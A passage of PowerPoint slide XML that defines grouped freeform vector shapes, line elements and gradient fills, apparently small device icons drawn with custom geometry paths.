                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 224"/>
                    <a:gd name="T1" fmla="*/ 0 h 529"/>
                    <a:gd name="T2" fmla="*/ 0 w 224"/>
                    <a:gd name="T3" fmla="*/ 470 h 529"/>
                    <a:gd name="T4" fmla="*/ 224 w 224"/>
                    <a:gd name="T5" fmla="*/ 529 h 529"/>
                    <a:gd name="T6" fmla="*/ 224 w 224"/>
                    <a:gd name="T7" fmla="*/ 61 h 529"/>
                    <a:gd name="T8" fmla="*/ 0 w 224"/>
                    <a:gd name="T9" fmla="*/ 0 h 5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4" h="529">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="470"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="224" y="529"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="224" y="6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96" name="Freeform 1737">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{357EAC40-2A91-45BB-AD06-11DAC511621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1258" y="-2309"/>
                  <a:ext cx="678" cy="182"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 678"/>
                    <a:gd name="T1" fmla="*/ 121 h 182"/>
                    <a:gd name="T2" fmla="*/ 451 w 678"/>
                    <a:gd name="T3" fmla="*/ 0 h 182"/>
                    <a:gd name="T4" fmla="*/ 678 w 678"/>
                    <a:gd name="T5" fmla="*/ 62 h 182"/>
                    <a:gd name="T6" fmla="*/ 224 w 678"/>
                    <a:gd name="T7" fmla="*/ 182 h 182"/>
                    <a:gd name="T8" fmla="*/ 0 w 678"/>
                    <a:gd name="T9" fmla="*/ 121 h 1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8" h="182">
                      <a:moveTo>
                        <a:pt x="0" y="121"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="451" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="678" y="62"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="224" y="182"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="12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97" name="Freeform 1738">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8356529B-EA4D-4045-9487-CE7308D6F39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1228" y="-2134"/>
                  <a:ext cx="156" cy="88"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 156"/>
                    <a:gd name="T1" fmla="*/ 0 h 88"/>
                    <a:gd name="T2" fmla="*/ 0 w 156"/>
                    <a:gd name="T3" fmla="*/ 48 h 88"/>
                    <a:gd name="T4" fmla="*/ 156 w 156"/>
                    <a:gd name="T5" fmla="*/ 88 h 88"/>
                    <a:gd name="T6" fmla="*/ 156 w 156"/>
                    <a:gd name="T7" fmla="*/ 43 h 88"/>
                    <a:gd name="T8" fmla="*/ 0 w 156"/>
                    <a:gd name="T9" fmla="*/ 0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6" h="88">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="48"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="156" y="88"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="156" y="4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043" name="Line 1768">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3C65029-B4C2-49FD-A0E2-5D031BB0A93D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>
                <a:off x="6480175" y="2600326"/>
                <a:ext cx="0" cy="142875"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050">
                <a:solidFill>
                  <a:srgbClr val="FF66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044" name="Group 1740">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02772534-6679-4AC7-A7BD-A415E16787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64275" y="2459038"/>
                <a:ext cx="341313" cy="220663"/>
                <a:chOff x="126" y="1682"/>
                <a:chExt cx="646" cy="417"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="2078" name="Freeform 1741">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE7F4926-9D89-4234-AE12-A782D81E21F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95" y="1682"/>
                  <a:ext cx="295" cy="368"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 14 w 211"/>
                    <a:gd name="T1" fmla="*/ 8 h 263"/>
                    <a:gd name="T2" fmla="*/ 14 w 211"/>
                    <a:gd name="T3" fmla="*/ 207 h 263"/>
                    <a:gd name="T4" fmla="*/ 192 w 211"/>
                    <a:gd name="T5" fmla="*/ 254 h 263"/>
                    <a:gd name="T6" fmla="*/ 192 w 211"/>
                    <a:gd name="T7" fmla="*/ 56 h 263"/>
                    <a:gd name="T8" fmla="*/ 14 w 211"/>
                    <a:gd name="T9" fmla="*/ 8 h 2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1" h="263">
                      <a:moveTo>
                        <a:pt x="14" y="8"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="16"/>
                        <a:pt x="1" y="187"/>
                        <a:pt x="14" y="207"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="226"/>
                        <a:pt x="179" y="263"/>
                        <a:pt x="192" y="254"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="204" y="246"/>
                        <a:pt x="211" y="94"/>
                        <a:pt x="192" y="56"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="185" y="42"/>
                        <a:pt x="28" y="0"/>
                        <a:pt x="14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79" name="Freeform 1742">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3078D6AA-C3B0-4D95-9460-0C0E1B37A1A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33" y="1719"/>
                  <a:ext cx="212" cy="291"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 359"/>
                    <a:gd name="T1" fmla="*/ 0 h 493"/>
                    <a:gd name="T2" fmla="*/ 0 w 359"/>
                    <a:gd name="T3" fmla="*/ 397 h 493"/>
                    <a:gd name="T4" fmla="*/ 359 w 359"/>
                    <a:gd name="T5" fmla="*/ 493 h 493"/>
                    <a:gd name="T6" fmla="*/ 359 w 359"/>
                    <a:gd name="T7" fmla="*/ 97 h 493"/>
                    <a:gd name="T8" fmla="*/ 0 w 359"/>
                    <a:gd name="T9" fmla="*/ 0 h 4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9" h="493">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="397"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="359" y="493"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="359" y="9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69A2E1"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="69A2E1">
                        <a:gamma/>
                        <a:tint val="60784"/>
                        <a:invGamma/>
                      </a:srgbClr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80" name="Freeform 1743">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F64C4AA9-9E1E-449A-943B-0EB7151FB47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15" y="1684"/>
                  <a:ext cx="284" cy="90"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 99 w 203"/>
                    <a:gd name="T1" fmla="*/ 15 h 65"/>
                    <a:gd name="T2" fmla="*/ 27 w 203"/>
                    <a:gd name="T3" fmla="*/ 0 h 65"/>
                    <a:gd name="T4" fmla="*/ 0 w 203"/>
                    <a:gd name="T5" fmla="*/ 7 h 65"/>
                    <a:gd name="T6" fmla="*/ 0 w 203"/>
                    <a:gd name="T7" fmla="*/ 7 h 65"/>
                    <a:gd name="T8" fmla="*/ 0 w 203"/>
                    <a:gd name="T9" fmla="*/ 7 h 65"/>
                    <a:gd name="T10" fmla="*/ 178 w 203"/>
                    <a:gd name="T11" fmla="*/ 55 h 65"/>
                    <a:gd name="T12" fmla="*/ 203 w 203"/>
                    <a:gd name="T13" fmla="*/ 48 h 65"/>
                    <a:gd name="T14" fmla="*/ 99 w 203"/>
                    <a:gd name="T15" fmla="*/ 15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03" h="65">
                      <a:moveTo>
                        <a:pt x="99" y="15"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="2"/>
                        <a:pt x="27" y="0"/>
                        <a:pt x="27" y="0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2" y="0"/>
                        <a:pt x="168" y="44"/>
                        <a:pt x="178" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="188" y="65"/>
                        <a:pt x="203" y="48"/>
                        <a:pt x="203" y="48"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="203" y="48"/>
                        <a:pt x="163" y="29"/>
                        <a:pt x="99" y="1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81" name="Freeform 1744">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B50AF41-8DBF-45E8-BD5C-A2A6E789B18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64" y="1751"/>
                  <a:ext cx="208" cy="286"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 149"/>
                    <a:gd name="T1" fmla="*/ 205 h 205"/>
                    <a:gd name="T2" fmla="*/ 15 w 149"/>
                    <a:gd name="T3" fmla="*/ 201 h 205"/>
                    <a:gd name="T4" fmla="*/ 129 w 149"/>
                    <a:gd name="T5" fmla="*/ 150 h 205"/>
                    <a:gd name="T6" fmla="*/ 149 w 149"/>
                    <a:gd name="T7" fmla="*/ 112 h 205"/>
                    <a:gd name="T8" fmla="*/ 149 w 149"/>
                    <a:gd name="T9" fmla="*/ 60 h 205"/>
                    <a:gd name="T10" fmla="*/ 25 w 149"/>
                    <a:gd name="T11" fmla="*/ 0 h 205"/>
                    <a:gd name="T12" fmla="*/ 0 w 149"/>
                    <a:gd name="T13" fmla="*/ 7 h 205"/>
                    <a:gd name="T14" fmla="*/ 0 w 149"/>
                    <a:gd name="T15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49" h="205">
                      <a:moveTo>
                        <a:pt x="0" y="205"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="201"/>
                        <a:pt x="15" y="201"/>
                        <a:pt x="15" y="201"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="129" y="150"/>
                        <a:pt x="129" y="150"/>
                        <a:pt x="129" y="150"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="149" y="112"/>
                        <a:pt x="149" y="112"/>
                        <a:pt x="149" y="112"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="149" y="60"/>
                        <a:pt x="149" y="60"/>
                        <a:pt x="149" y="6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3" y="35"/>
                        <a:pt x="20" y="189"/>
                        <a:pt x="0" y="20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82" name="Freeform 1745">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{083BA1E0-A30B-40DB-8A64-B2C834F68B6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26" y="1976"/>
                  <a:ext cx="391" cy="103"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 661"/>
                    <a:gd name="T1" fmla="*/ 52 h 175"/>
                    <a:gd name="T2" fmla="*/ 208 w 661"/>
                    <a:gd name="T3" fmla="*/ 0 h 175"/>
                    <a:gd name="T4" fmla="*/ 661 w 661"/>
                    <a:gd name="T5" fmla="*/ 121 h 175"/>
                    <a:gd name="T6" fmla="*/ 453 w 661"/>
                    <a:gd name="T7" fmla="*/ 175 h 175"/>
                    <a:gd name="T8" fmla="*/ 0 w 661"/>
                    <a:gd name="T9" fmla="*/ 52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1" h="175">
                      <a:moveTo>
                        <a:pt x="0" y="52"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="208" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="661" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="453" y="175"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="5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83" name="Freeform 1746">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{109316A1-BF96-45FD-BE6D-BD5E74E4203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94" y="2047"/>
                  <a:ext cx="118" cy="52"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 199"/>
                    <a:gd name="T1" fmla="*/ 54 h 87"/>
                    <a:gd name="T2" fmla="*/ 0 w 199"/>
                    <a:gd name="T3" fmla="*/ 87 h 87"/>
                    <a:gd name="T4" fmla="*/ 199 w 199"/>
                    <a:gd name="T5" fmla="*/ 35 h 87"/>
                    <a:gd name="T6" fmla="*/ 199 w 199"/>
                    <a:gd name="T7" fmla="*/ 0 h 87"/>
                    <a:gd name="T8" fmla="*/ 0 w 199"/>
                    <a:gd name="T9" fmla="*/ 54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9" h="87">
                      <a:moveTo>
                        <a:pt x="0" y="54"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="87"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="199" y="35"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="199" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="5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84" name="Freeform 1747">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92161C51-9296-4A12-A16F-07743911B70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26" y="2006"/>
                  <a:ext cx="268" cy="93"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 453 w 453"/>
                    <a:gd name="T1" fmla="*/ 156 h 156"/>
                    <a:gd name="T2" fmla="*/ 0 w 453"/>
                    <a:gd name="T3" fmla="*/ 36 h 156"/>
                    <a:gd name="T4" fmla="*/ 0 w 453"/>
                    <a:gd name="T5" fmla="*/ 0 h 156"/>
                    <a:gd name="T6" fmla="*/ 453 w 453"/>
                    <a:gd name="T7" fmla="*/ 123 h 156"/>
                    <a:gd name="T8" fmla="*/ 453 w 453"/>
                    <a:gd name="T9" fmla="*/ 156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3" h="156">
                      <a:moveTo>
                        <a:pt x="453" y="156"/>
                      </a:move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453" y="123"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="453" y="15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85" name="Freeform 1748">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9EEC652-AB08-4BE7-AF4E-4DD24D4C465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4" y="1984"/>
                  <a:ext cx="306" cy="83"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 517"/>
                    <a:gd name="T1" fmla="*/ 37 h 139"/>
                    <a:gd name="T2" fmla="*/ 382 w 517"/>
                    <a:gd name="T3" fmla="*/ 139 h 139"/>
                    <a:gd name="T4" fmla="*/ 517 w 517"/>
                    <a:gd name="T5" fmla="*/ 101 h 139"/>
                    <a:gd name="T6" fmla="*/ 134 w 517"/>
                    <a:gd name="T7" fmla="*/ 0 h 139"/>
                    <a:gd name="T8" fmla="*/ 0 w 517"/>
                    <a:gd name="T9" fmla="*/ 37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7" h="139">
                      <a:moveTo>
                        <a:pt x="0" y="37"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="382" y="139"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="517" y="101"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="134" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="3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045" name="Line 1769">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5A1EADD-B969-469F-80D2-73AE0CAC08A4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>
                <a:off x="5832475" y="2600326"/>
                <a:ext cx="0" cy="142875"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050">
                <a:solidFill>
                  <a:srgbClr val="FF66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46" name="Line 1770">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3A642E4-CDFC-47DC-9C2A-0E3514C81884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>
                <a:off x="5472113" y="2708276"/>
                <a:ext cx="0" cy="142875"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050">
                <a:solidFill>
                  <a:srgbClr val="FF66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047" name="Group 1767">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7095F43B-D04B-4060-BD7E-6C639BD06E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27650" y="2457451"/>
                <a:ext cx="701675" cy="323850"/>
                <a:chOff x="3356" y="1525"/>
                <a:chExt cx="442" cy="204"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="2060" name="Group 1749">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68F301DA-B58E-4AFD-9AE7-854FA321CDB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3583" y="1525"/>
                  <a:ext cx="215" cy="139"/>
                  <a:chOff x="126" y="1682"/>
                  <a:chExt cx="646" cy="417"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="2070" name="Freeform 1750">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25B3F25F-6EA5-4427-B708-7EA912B137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95" y="1682"/>
                    <a:ext cx="295" cy="368"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 14 w 211"/>
                      <a:gd name="T1" fmla="*/ 8 h 263"/>
                      <a:gd name="T2" fmla="*/ 14 w 211"/>
                      <a:gd name="T3" fmla="*/ 207 h 263"/>
                      <a:gd name="T4" fmla="*/ 192 w 211"/>
                      <a:gd name="T5" fmla="*/ 254 h 263"/>
                      <a:gd name="T6" fmla="*/ 192 w 211"/>
                      <a:gd name="T7" fmla="*/ 56 h 263"/>
                      <a:gd name="T8" fmla="*/ 14 w 211"/>
                      <a:gd name="T9" fmla="*/ 8 h 2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1" h="263">
                        <a:moveTo>
                          <a:pt x="14" y="8"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="16"/>
                          <a:pt x="1" y="187"/>
                          <a:pt x="14" y="207"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="27" y="226"/>
                          <a:pt x="179" y="263"/>
                          <a:pt x="192" y="254"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="204" y="246"/>
                          <a:pt x="211" y="94"/>
                          <a:pt x="192" y="56"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="185" y="42"/>
                          <a:pt x="28" y="0"/>
                          <a:pt x="14" y="8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71" name="Freeform 1751">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E3C73A1-3112-4F58-9A56-48960047AF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333" y="1719"/>
                    <a:ext cx="212" cy="291"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 359"/>
                      <a:gd name="T1" fmla="*/ 0 h 493"/>
                      <a:gd name="T2" fmla="*/ 0 w 359"/>
                      <a:gd name="T3" fmla="*/ 397 h 493"/>
                      <a:gd name="T4" fmla="*/ 359 w 359"/>
                      <a:gd name="T5" fmla="*/ 493 h 493"/>
                      <a:gd name="T6" fmla="*/ 359 w 359"/>
                      <a:gd name="T7" fmla="*/ 97 h 493"/>
                      <a:gd name="T8" fmla="*/ 0 w 359"/>
                      <a:gd name="T9" fmla="*/ 0 h 4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59" h="493">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="397"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="359" y="493"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="359" y="9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69A2E1"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="69A2E1">
                          <a:gamma/>
                          <a:tint val="68627"/>
                          <a:invGamma/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="27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72" name="Freeform 1752">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B4F734F-57F0-4508-A660-A0BFC999DD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315" y="1684"/>
                    <a:ext cx="284" cy="90"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 99 w 203"/>
                      <a:gd name="T1" fmla="*/ 15 h 65"/>
                      <a:gd name="T2" fmla="*/ 27 w 203"/>
                      <a:gd name="T3" fmla="*/ 0 h 65"/>
                      <a:gd name="T4" fmla="*/ 0 w 203"/>
                      <a:gd name="T5" fmla="*/ 7 h 65"/>
                      <a:gd name="T6" fmla="*/ 0 w 203"/>
                      <a:gd name="T7" fmla="*/ 7 h 65"/>
                      <a:gd name="T8" fmla="*/ 0 w 203"/>
                      <a:gd name="T9" fmla="*/ 7 h 65"/>
                      <a:gd name="T10" fmla="*/ 178 w 203"/>
                      <a:gd name="T11" fmla="*/ 55 h 65"/>
                      <a:gd name="T12" fmla="*/ 203 w 203"/>
                      <a:gd name="T13" fmla="*/ 48 h 65"/>
                      <a:gd name="T14" fmla="*/ 99 w 203"/>
                      <a:gd name="T15" fmla="*/ 15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03" h="65">
                        <a:moveTo>
                          <a:pt x="99" y="15"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="44" y="2"/>
                          <a:pt x="27" y="0"/>
                          <a:pt x="27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12" y="0"/>
                          <a:pt x="168" y="44"/>
                          <a:pt x="178" y="55"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="188" y="65"/>
                          <a:pt x="203" y="48"/>
                          <a:pt x="203" y="48"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="203" y="48"/>
                          <a:pt x="163" y="29"/>
                          <a:pt x="99" y="15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73" name="Freeform 1753">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99808EF0-0EF0-43CE-BF51-139F2A67F8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564" y="1751"/>
                    <a:ext cx="208" cy="286"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 149"/>
                      <a:gd name="T1" fmla="*/ 205 h 205"/>
                      <a:gd name="T2" fmla="*/ 15 w 149"/>
                      <a:gd name="T3" fmla="*/ 201 h 205"/>
                      <a:gd name="T4" fmla="*/ 129 w 149"/>
                      <a:gd name="T5" fmla="*/ 150 h 205"/>
                      <a:gd name="T6" fmla="*/ 149 w 149"/>
                      <a:gd name="T7" fmla="*/ 112 h 205"/>
                      <a:gd name="T8" fmla="*/ 149 w 149"/>
                      <a:gd name="T9" fmla="*/ 60 h 205"/>
                      <a:gd name="T10" fmla="*/ 25 w 149"/>
                      <a:gd name="T11" fmla="*/ 0 h 205"/>
                      <a:gd name="T12" fmla="*/ 0 w 149"/>
                      <a:gd name="T13" fmla="*/ 7 h 205"/>
                      <a:gd name="T14" fmla="*/ 0 w 149"/>
                      <a:gd name="T15" fmla="*/ 205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49" h="205">
                        <a:moveTo>
                          <a:pt x="0" y="205"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="15" y="201"/>
                          <a:pt x="15" y="201"/>
                          <a:pt x="15" y="201"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="129" y="150"/>
                          <a:pt x="129" y="150"/>
                          <a:pt x="129" y="150"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="149" y="112"/>
                          <a:pt x="149" y="112"/>
                          <a:pt x="149" y="112"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="149" y="60"/>
                          <a:pt x="149" y="60"/>
                          <a:pt x="149" y="60"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="25" y="0"/>
                          <a:pt x="25" y="0"/>
                          <a:pt x="25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13" y="35"/>
                          <a:pt x="20" y="189"/>
                          <a:pt x="0" y="205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74" name="Freeform 1754">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D7D9A3E-5FA1-48B2-A50F-0FB74CFB5F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26" y="1976"/>
                    <a:ext cx="391" cy="103"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 661"/>
                      <a:gd name="T1" fmla="*/ 52 h 175"/>
                      <a:gd name="T2" fmla="*/ 208 w 661"/>
                      <a:gd name="T3" fmla="*/ 0 h 175"/>
                      <a:gd name="T4" fmla="*/ 661 w 661"/>
                      <a:gd name="T5" fmla="*/ 121 h 175"/>
                      <a:gd name="T6" fmla="*/ 453 w 661"/>
                      <a:gd name="T7" fmla="*/ 175 h 175"/>
                      <a:gd name="T8" fmla="*/ 0 w 661"/>
                      <a:gd name="T9" fmla="*/ 52 h 1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61" h="175">
                        <a:moveTo>
                          <a:pt x="0" y="52"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="208" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="661" y="121"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="453" y="175"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="52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75" name="Freeform 1755">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD38D396-3CBA-4893-8CAA-1655D099B9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394" y="2047"/>
                    <a:ext cx="118" cy="52"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 199"/>
                      <a:gd name="T1" fmla="*/ 54 h 87"/>
                      <a:gd name="T2" fmla="*/ 0 w 199"/>
                      <a:gd name="T3" fmla="*/ 87 h 87"/>
                      <a:gd name="T4" fmla="*/ 199 w 199"/>
                      <a:gd name="T5" fmla="*/ 35 h 87"/>
                      <a:gd name="T6" fmla="*/ 199 w 199"/>
                      <a:gd name="T7" fmla="*/ 0 h 87"/>
                      <a:gd name="T8" fmla="*/ 0 w 199"/>
                      <a:gd name="T9" fmla="*/ 54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9" h="87">
                        <a:moveTo>
                          <a:pt x="0" y="54"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="87"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="199" y="35"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="199" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="54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76" name="Freeform 1756">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38555769-4660-4720-80C5-022F14B31C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26" y="2006"/>
                    <a:ext cx="268" cy="93"/>
